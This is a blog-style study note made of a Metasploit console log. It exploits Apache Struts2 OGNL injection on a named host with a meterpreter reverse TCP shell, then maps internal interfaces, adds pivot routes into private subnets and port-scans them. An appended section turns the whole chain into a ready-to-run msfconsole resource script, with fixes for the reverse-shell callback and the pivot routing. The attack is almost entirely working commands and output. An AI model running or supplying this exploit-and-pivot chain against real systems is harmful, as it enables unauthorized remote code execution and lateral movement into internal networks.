Metasploit Notes

Author: Luan   Category: Study Notes   Published: 2017-03-28 20:21
Last login: Tue Mar 28 18:32:40 2017 from 223.150.114.189
[root@Luan ~]# screen -ls
No Sockets found in /var/run/screen/S-root.

[root@Luan ~]# screen    

[root@Luan ~]# msfconsole
bash: msfconsole: command not found
[root@Luan ~]# cd /opt
[root@Luan opt]# cd metasploit-framework/
[root@Luan metasploit-framework]# cd bin
[root@Luan bin]# ./msfconsole
                                                  
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v4.14.6-dev-                         ]
+ -- --=[ 1636 exploits - 935 auxiliary - 285 post        ]
+ -- --=[ 472 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search struts
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                                     Disclosure Date  Rank       Description
   ----                                                     ---------------  ----       -----------
   exploit/multi/http/struts2_content_type_ognl             2017-03-07       excellent  Apache Struts Jakarta Multipart Parser OGNL Injection
   exploit/multi/http/struts_code_exec                      2010-07-13       good       Apache Struts Remote Command Execution
   exploit/multi/http/struts_code_exec_classloader          2014-03-06       manual     Apache Struts ClassLoader Manipulation Remote Code Execution
   exploit/multi/http/struts_code_exec_exception_delegator  2012-01-06       excellent  Apache Struts Remote Command Execution
   exploit/multi/http/struts_code_exec_parameters           2011-10-01       excellent  Apache Struts ParametersInterceptor Remote Code Execution
   exploit/multi/http/struts_default_action_mapper          2013-07-02       excellent  Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
   exploit/multi/http/struts_dev_mode                       2012-01-06       excellent  Apache Struts 2 Developer Mode OGNL Execution
   exploit/multi/http/struts_dmi_exec                       2016-04-27       excellent  Apache Struts Dynamic Method Invocation Remote Code Execution
   exploit/multi/http/struts_dmi_rest_exec                  2016-06-01       excellent  Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution
   exploit/multi/http/struts_include_params                 2013-05-24       great      Apache Struts includeParams Remote Code Execution

msf exploit(struts2_content_type_ognl) > show options

Module options (exploit/multi/http/struts2_content_type_ognl):

   Name       Current Setting     Required  Description
   ----       ---------------     --------  -----------
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                          yes       The target address
   RPORT      8080                yes       The target port (TCP)
   SSL        false               no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /struts2-showcase/  yes       The path to a struts application action
   VHOST                          no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Universal


msf exploit(struts2_content_type_ognl) > set rhost lu4n.com
rhost => lu4n.com
msf exploit(struts2_content_type_ognl) > set rport 80
rport => 80
msf exploit(struts2_content_type_ognl) > set targeturi /nice-bus/login!login.action
targeturi => /nice-bus/login!login.action
msf exploit(struts2_content_type_ognl) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts2_content_type_ognl) > show options

Module options (exploit/multi/http/struts2_content_type_ognl):

   Name       Current Setting               Required  Description
   ----       ---------------               --------  -----------
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      lu4n.com                      yes       The target address
   RPORT      80                            yes       The target port (TCP)
   SSL        false                         no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /nice-bus/login!login.action  yes       The path to a struts application action
   VHOST                                    no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LHOST                          yes       The listen address
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Universal


msf exploit(struts2_content_type_ognl) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(struts2_content_type_ognl) > set LHOST lu4n.com
LHOST => lu4n.com
msf exploit(struts2_content_type_ognl) > set LPORT 8889
LPORT => 8889
msf exploit(struts2_content_type_ognl) > run

[*] Started reverse TCP handler on 223.150.114.189:8889 
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 223.150.114.189
[*] Meterpreter session 1 opened (223.150.114.189:8889 -> 223.150.114.189:65359) at 2017-03-28 19:27:22 +0800


meterpreter > ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
Flags        : UP LOOPBACK RUNNING 
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface  2
============
Name         : eth0
Hardware MAC : 6c:0b:84:9b:14:52
MTU          : 1500
Flags        : UP BROADCAST RUNNING MULTICAST 
IPv4 Address : 192.168.128.10
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::6e0b:84ff:fe9b:1452
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  3
============
Name         : eth1
Hardware MAC : 6c:0b:84:9b:14:53
MTU          : 1500
Flags        : UP BROADCAST RUNNING MULTICAST 
IPv4 Address : 10.23.2.234
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::6e0b:84ff:fe9b:1453
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  4
============
Name         : eth2
Hardware MAC : 6c:0b:84:9b:14:54
MTU          : 1500
Flags        : BROADCAST MULTICAST 


Interface  6
============
Name         : eth3
Hardware MAC : 6c:0b:84:9b:14:55
MTU          : 1500
Flags        : BROADCAST MULTICAST 


Interface  8
============
Name         : usb0
Hardware MAC : 02:e0:ec:2e:7c:2f
MTU          : 1500
Flags        : BROADCAST MULTICAST 

meterpreter > route

IPv4 network routes
===================

    Subnet         Netmask        Gateway          Metric  Interface
    ------         -------        -------          ------  ---------
    0.0.0.0        0.0.0.0        192.168.128.254  0       eth0
    10.23.2.0      255.255.255.0  0.0.0.0          0       eth1
    192.168.128.0  255.255.255.0  0.0.0.0          0       eth0


IPv6 network routes
===================

    Subnet  Netmask                                  Gateway  Metric  Interface
    ------  -------                                  -------  ------  ---------
    ::1     ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       256     lo
    fe80::  ffff:ffff:ffff:ffff::                    ::       256     eth1
    fe80::  ffff:ffff:ffff:ffff::                    ::       256     eth0
meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/windows/manage/autoroute.
[!] Example: run post/windows/manage/autoroute OPTION=value [...]
Local subnet: 10.23.2.0/255.255.255.0
Local subnet: 192.168.128.0/255.255.255.0
Local subnet: ::1/ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Local subnet: fe80::/ffff:ffff:ffff:ffff::
Local subnet: fe80::/ffff:ffff:ffff:ffff::
meterpreter > route add 192.168.128.0 255.255.255.0 2
Creating route 192.168.128.0/255.255.255.0 -> 2
[-] stdapi_net_config_add_route: Operation failed: 95
meterpreter > run autoroute -s 192.168.128.0

[!] Meterpreter scripts are deprecated. Try post/windows/manage/autoroute.
[!] Example: run post/windows/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.128.0/255.255.255.0...
[+] Added route to 192.168.128.0/255.255.255.0 via 218.76.55.147
[*] Use the -p option to list all active routes
meterpreter > run autoroute -s 10.23.2.0

[!] Meterpreter scripts are deprecated. Try post/windows/manage/autoroute.
[!] Example: run post/windows/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.23.2.0/255.255.255.0...
[+] Added route to 10.23.2.0/255.255.255.0 via 218.76.55.147
[*] Use the -p option to list all active routes
meterpreter > background
[*] Backgrounding session 1...
msf exploit(struts2_content_type_ognl) > route print

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.23.2.0          255.255.255.0      Session 1
   192.168.128.0      255.255.255.0      Session 1

[*] There are currently no IPv6 routes defined.
msf exploit(struts2_content_type_ognl) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf auxiliary(tcp) > set rhosts 192.168.128.1-255
rhosts => 192.168.128.1-255
msf auxiliary(tcp) > run
[*] 192.168.128.10 - Meterpreter session 1 closed.  Reason: Died
^C
[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf auxiliary(tcp) > sessions

Active sessions
===============

No active sessions.

msf auxiliary(tcp) >

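The whole procedure from the log above, written out as one msfconsole resource script. This is an added example, not something from the original post; it reuses the target, URI and handler values from the log as placeholders for your own lab, and it assumes the new session is session 1 and that `post/multi/manage/autoroute` (the module the deprecation warning points at) is present in your install. Two points the log shows the hard way are made explicit: LHOST has to be an address the target can actually connect back to (the log first sets 0.0.0.0, which only binds the listener, then corrects it), and pivot routes are added with the framework's own `route add <subnet> <netmask> <session>` at the `msf` prompt, not meterpreter's `route add`, which edits the compromised host's routing table and is what produced `Operation failed: 95` above.

```text
# pivot.rc  (added example; values below are placeholders for your own lab)
# Run with:  msfconsole -q -r pivot.rc

# 1. Exploit the Struts 2 host exactly as in the log.
use exploit/multi/http/struts2_content_type_ognl
set RHOST lu4n.com
set RPORT 80
set TARGETURI /nice-bus/login!login.action
set PAYLOAD linux/x86/meterpreter/reverse_tcp
# LHOST is what the stager connects back to: use a reachable address,
# never 0.0.0.0 (that only chooses the listener bind address).
set LHOST lu4n.com
set LPORT 8889
# -z: do not drop into the session, leave it backgrounded so the script continues.
exploit -z

# 2. Add pivot routes at the framework level. These tell msf to send traffic
#    for the subnets through the meterpreter session (assumed to be session 1);
#    they do not touch the target's routing table.
route add 192.168.128.0 255.255.255.0 1
route add 10.23.2.0 255.255.255.0 1
# Equivalent alternative (assumed module): let autoroute read the session's
# interfaces and add every local subnet itself.
#   use post/multi/manage/autoroute
#   set SESSION 1
#   set CMD autoadd
#   run
route print

# 3. Scan through the pivot. Keep the port list short and the thread count low:
#    every probe is tunnelled over the single meterpreter channel, and a
#    large 1-10000 sweep across a whole /24 is a lot to push through it.
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.128.0/24
set PORTS 22,80,443,3306,8080
set THREADS 5
set TIMEOUT 2000
run

# 4. Confirm the pivot is still alive; if the session died mid-scan
#    (as in the log) the routes above no longer lead anywhere.
sessions -l
route print
```

`route print` at the `msf` prompt is the check that the pivot is actually in place before the scanner is started: the subnets should appear with `Session 1` as their gateway, as in the `IPv4 Active Routing Table` output above. If the session is lost, re-run the exploit and add the routes again against the new session number rather than relying on the stale entries.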